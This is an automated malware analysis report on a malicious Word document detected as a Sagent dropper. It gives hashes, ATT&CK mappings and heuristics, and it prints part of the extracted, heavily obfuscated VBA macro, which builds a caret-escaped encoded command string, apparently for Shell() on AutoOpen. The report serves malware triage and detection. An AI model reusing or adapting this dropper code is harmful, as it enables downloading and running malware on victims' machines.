Office (OLE) malware analysis — malicious · e3534bcd57938b30

MALICIOUS

Office (OLE)

82.6 KB Created: 2018-08-30 23:29:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: aa3e0e2208bfe7feca1b8d5772d92d4e SHA-1: 0c366e38ca7167bca7fd9b33df2bc66974b34d47 SHA-256: e3534bcd57938b306f7de8d37723ee645aba267022287277b2e3ed60605a0d89

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The file contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes a Shell() call to execute a command-line utility. This utility appears to be designed to download and execute a second-stage payload, as indicated by the reconstructed command string 'md /V /C set 5KoY=AAC'. The ClamAV detection name 'Doc.Dropper.Sagent-6667985-0' further supports its role as a dropper.

Heuristics 6

ClamAV: Doc.Dropper.Sagent-6667985-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Sagent-6667985-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9475 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9475 bytes
SHA-256: `d6897d4e5f735c83b834dc7860b86c4ad6ac4b002aabc5e9f97efea74cc86b0a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZrnDJfirlOumq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "bHhJoJVkjaA" Function MRvkQL() On _ Error _ Resume _ Next Hour 18813 * rDzaa / sRdkb * 56990 Hour 52298 / brvId Hour 98170 / 5979 Hour 93826 / lLlIb Hour 58048 * PSTzAY rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC" Hour zufTJ / sPiiNJ * HHGrtK / XmIbC Hour rSVVX * ipdRV LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q" Hour lYKDqL * DRvqlz Hour SjOWd * IoHLnw Hour 13847 / zZJaC Hour Ejhmi / Liolid MiGGcwqb = "fA^0H^A" + "7^BA^a" + "^A^M^G^" + "A0" + "^B^Q" + "Y^AMG^A" + "^9^B" + "w^OAs" + "GA" + "hBQ^Z^A" + "IH^A^iB" Hour ZTfBNZ * FLWcu / wLIsq / jQPVA Hour 85837 * XkDcFJ / 79039 * atVSIh Hour 83767 / KkjLBw / 45172 * JnOPT Hour 77815 / HcFDcV OADXutEzck = "^wO" + "^A^w^" + "GAN^" + "BQb^AQ" + "C^A^gAQ" + "^b^" + "A^U" + "^G^A^0" + "^B^Q^" + "S" Hour GZnwdG / 36176 Hour 53 / rizjzQ / juVdiN * SaiSJ zToUJvniTO = "^A" + "0C^" + "A" + "l^B^" + "w^aA8G" Hour 8551 / GRfzK Hour 24529 / CUlFJk * 39266 / QjUbX Hour GLIALI * TzmTA / 36107 * ZPflB uUAHjhCm = "^A2B^g" + "bAkE" + "^A^7A^Q" + "K" + "^Aw" + "GAN^B" + "Q" + "^b^A^" + "QC" + "A^gA" + "^ALA" Hour 13143 / SwpVnj Hour 69242 / 3376 Hour GjXNb * wnhaIo TQcOjvoL = "Q^E^A^0" + "Bg^e" + "^A^QC^" + "Ao^" + "A^QZ^" + "Aw^" + "G" + "Ap^B^" + "gR" + "AQGA" + "h" Hour NGiihh / zOPJzS Hour 59246 * HNVrIj JHVRhm = "Bw" + "bA^w^G^" + "AuB^" + "w^" + "d^A8^G" + "^" + "AE^B" + "^g^L^A" + "MHA" + "tBAVAQ" + "CA^7^B" + "^Q^e^" MRvkQL = rnwIiB + LKbZwRbqKVT + MiGGcwqb + OADXutEzck + zToUJvniTO + uUAHjhCm + TQcOjvoL + JHVRhm Hour pZZPv / 40997 End Function Function umRtWz() On _ Error _ Resume _ Next Hour QvNzCj * jhsEO / 61338 * Cbswj Hour FPzcY * NnrHnw * 40361 * qLWoTo Hour 83245 / HIPBTa * 37186 * hHXXw Hour PfTFR * jIVFsG / 75331 / wwmnv TiENB = "AI" + "^HA0^B^" + "w^e^A" + "kC" + "^Ar^" + "B^Q" + "^T" + "^AcEA^k" + "A^" + "AI" + "A^4^" + "GA^p" + "BAI^A^" Hour 35269 / uUXuj Hour PrvAji * BWPhvJ Hour 330 * jPYKz * ITSUmh * 74136 TYuYZakJlKs = "Q^EA0^B" + "g^e" + "A^Q" + "C^A^oA" + "A^a" + "A^M^" + "G^" Hour qYpWT / SFCJu / 82951 / 58160 Hour 84463 / HkpKai Hour MwwJiW * NUBRKJ Hour 81561 / wTiAG * YZVJu / LFjDRI PipfGatdikZ = "AhB" + "^QZ^A" + "^I^" + "H" + "AvBg^" + "Z" + "AsD^An" + "A" + "Q^" + "ZA^" + "g^" Hour 18793 / FTzki / LUUCG * HKRnG Hour ViqRT / DDBFwL * 42049 / amYIz Hour 80361 * TXMPCG JvHqUX = "H^A^l" + "^" + "BgL^AcC" + "^Ar^" + "A^w" + "Y" + "^A" + "cFAw" + "BA^" + "J" + "^A^s" Hour 4094 / tbLJOW Hour 70526 / jXtfH * 58387 / GZCmk Hour 28709 / nijjM / 25640 / bwQcoo VMrINN = "C^An^A" + "A^X^AcC" + "Ar^" + "A" + "^w^" + "Y^A^k^" + "G^A^s" Hour 81619 * iCutL * 73703 * WcGjk iTTaXWKbA = "Bg" + "Y" + "A^UHAwB" + "^g" + "^O^A" + "Y^" + "H^A^" + "uBQZ^" + "AQCA9" Hour nwafq / wpmLh * 29355 / PvlkU zlhazp = "^AA^b" + "^A^" + "0^EA" + "^t" + "BAJA^s" + "D^An^A^" + "A" + "MAUD^A" + "2A^" + "wJA^ACA" + "^9^" + "A" Hour 37630 * qwuzXD ulCQUSP = "AIA" + "MGA^" + "X^B^Ac^" + "A^" + "QC" Hour 70925 * dtorif / aQJEYU * CGpIRX Hour 32444 * 42522 * vQATnI / CaJbpZ Hour Bilzlh * AFiNH * iXMGjV / PBKzqH FioFZrj = "^A7A^Q^" + "K^AcCAA" + "Bw^" + "JAgC^" + "A0^B" + "Q^aAw^" + "GAwB^wU" + "A^4" Hour 8087 * WJwOf * 33573 / HfBzLX Hour lmqXRb / DIrAzN tXYTDWbJh = "C" + "^An" + "^A" + "^QSA" + "^MEA" + "^y^B^" + "g" + "^b^A8" + "CA^4" Hour 85626 * FqzBMk / 11484 / vQHQz Hour FSlAa / OTVzLw / ipNFO * QSpTU Hour 66347 / PdjfuK / 51671 / ubDmXu DUnhRKD = "B^Q^b" + "A" + "4CA^tB" + "w^b^A^" + "MG^A^" + "u^AA^Z^" + "AUGA^y" umRtWz = TiENB + TYuYZakJlKs + PipfGatdikZ + JvHq ... (truncated)

SHA-256: d6897d4e5f735c83b834dc7860b86c4ad6ac4b002aabc5e9f97efea74cc86b0a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZrnDJfirlOumq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bHhJoJVkjaA"
Function MRvkQL()

On _
Error _
Resume _
Next
Hour 18813 * rDzaa / sRdkb * 56990
   Hour 52298 / brvId
   Hour 98170 / 5979
   Hour 93826 / lLlIb
   Hour 58048 * PSTzAY
rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC"
Hour zufTJ / sPiiNJ * HHGrtK / XmIbC
   Hour rSVVX * ipdRV
LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q"
Hour lYKDqL * DRvqlz
   Hour SjOWd * IoHLnw
   Hour 13847 / zZJaC
   Hour Ejhmi / Liolid
MiGGcwqb = "fA^0H^A" + "7^BA^a" + "^A^M^G^" + "A0" + "^B^Q" + "Y^AMG^A" + "^9^B" + "w^OAs" + "GA" + "hBQ^Z^A" + "IH^A^iB"
Hour ZTfBNZ * FLWcu / wLIsq / jQPVA
   Hour 85837 * XkDcFJ / 79039 * atVSIh
   Hour 83767 / KkjLBw / 45172 * JnOPT
   Hour 77815 / HcFDcV
OADXutEzck = "^wO" + "^A^w^" + "GAN^" + "BQb^AQ" + "C^A^gAQ" + "^b^" + "A^U" + "^G^A^0" + "^B^Q^" + "S"
Hour GZnwdG / 36176
   Hour 53 / rizjzQ / juVdiN * SaiSJ
zToUJvniTO = "^A" + "0C^" + "A" + "l^B^" + "w^aA8G"
Hour 8551 / GRfzK
   Hour 24529 / CUlFJk * 39266 / QjUbX
   Hour GLIALI * TzmTA / 36107 * ZPflB
uUAHjhCm = "^A2B^g" + "bAkE" + "^A^7A^Q" + "K" + "^Aw" + "GAN^B" + "Q" + "^b^A^" + "QC" + "A^gA" + "^ALA"
Hour 13143 / SwpVnj
   Hour 69242 / 3376
   Hour GjXNb * wnhaIo
TQcOjvoL = "Q^E^A^0" + "Bg^e" + "^A^QC^" + "Ao^" + "A^QZ^" + "Aw^" + "G" + "Ap^B^" + "gR" + "AQGA" + "h"
Hour NGiihh / zOPJzS
   Hour 59246 * HNVrIj
JHVRhm = "Bw" + "bA^w^G^" + "AuB^" + "w^" + "d^A8^G" + "^" + "AE^B" + "^g^L^A" + "MHA" + "tBAVAQ" + "CA^7^B" + "^Q^e^"
MRvkQL = rnwIiB + LKbZwRbqKVT + MiGGcwqb + OADXutEzck + zToUJvniTO + uUAHjhCm + TQcOjvoL + JHVRhm
   Hour pZZPv / 40997
End Function
Function umRtWz()

On _
Error _
Resume _
Next
Hour QvNzCj * jhsEO / 61338 * Cbswj
   Hour FPzcY * NnrHnw * 40361 * qLWoTo
   Hour 83245 / HIPBTa * 37186 * hHXXw
   Hour PfTFR * jIVFsG / 75331 / wwmnv
TiENB = "AI" + "^HA0^B^" + "w^e^A" + "kC" + "^Ar^" + "B^Q" + "^T" + "^AcEA^k" + "A^" + "AI" + "A^4^" + "GA^p" + "BAI^A^"
Hour 35269 / uUXuj
   Hour PrvAji * BWPhvJ
   Hour 330 * jPYKz * ITSUmh * 74136
TYuYZakJlKs = "Q^EA0^B" + "g^e" + "A^Q" + "C^A^oA" + "A^a" + "A^M^" + "G^"
Hour qYpWT / SFCJu / 82951 / 58160
   Hour 84463 / HkpKai
   Hour MwwJiW * NUBRKJ
   Hour 81561 / wTiAG * YZVJu / LFjDRI
PipfGatdikZ = "AhB" + "^QZ^A" + "^I^" + "H" + "AvBg^" + "Z" + "AsD^An" + "A" + "Q^" + "ZA^" + "g^"
Hour 18793 / FTzki / LUUCG * HKRnG
   Hour ViqRT / DDBFwL * 42049 / amYIz
   Hour 80361 * TXMPCG
JvHqUX = "H^A^l" + "^" + "BgL^AcC" + "^Ar^" + "A^w" + "Y" + "^A" + "cFAw" + "BA^" + "J" + "^A^s"
Hour 4094 / tbLJOW
   Hour 70526 / jXtfH * 58387 / GZCmk
   Hour 28709 / nijjM / 25640 / bwQcoo
VMrINN = "C^An^A" + "A^X^AcC" + "Ar^" + "A" + "^w^" + "Y^A^k^" + "G^A^s"
Hour 81619 * iCutL * 73703 * WcGjk
iTTaXWKbA = "Bg" + "Y" + "A^UHAwB" + "^g" + "^O^A" + "Y^" + "H^A^" + "uBQZ^" + "AQCA9"
Hour nwafq / wpmLh * 29355 / PvlkU
zlhazp = "^AA^b" + "^A^" + "0^EA" + "^t" + "BAJA^s" + "D^An^A^" + "A" + "MAUD^A" + "2A^" + "wJA^ACA" + "^9^" + "A"
Hour 37630 * qwuzXD
ulCQUSP = "AIA" + "MGA^" + "X^B^Ac^" + "A^" + "QC"
Hour 70925 * dtorif / aQJEYU * CGpIRX
   Hour 32444 * 42522 * vQATnI / CaJbpZ
   Hour Bilzlh * AFiNH * iXMGjV / PBKzqH
FioFZrj = "^A7A^Q^" + "K^AcCAA" + "Bw^" + "JAgC^" + "A0^B" + "Q^aAw^" + "GAwB^wU" + "A^4"
Hour 8087 * WJwOf * 33573 / HfBzLX
   Hour lmqXRb / DIrAzN
tXYTDWbJh = "C" + "^An" + "^A" + "^QSA" + "^MEA" + "^y^B^" + "g" + "^b^A8" + "CA^4"
Hour 85626 * FqzBMk / 11484 / vQHQz
   Hour FSlAa / OTVzLw / ipNFO * QSpTU
   Hour 66347 / PdjfuK / 51671 / ubDmXu
DUnhRKD = "B^Q^b" + "A" + "4CA^tB" + "w^b^A^" + "MG^A^" + "u^AA^Z^" + "AUGA^y"
umRtWz = TiENB + TYuYZakJlKs + PipfGatdikZ + JvHq
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.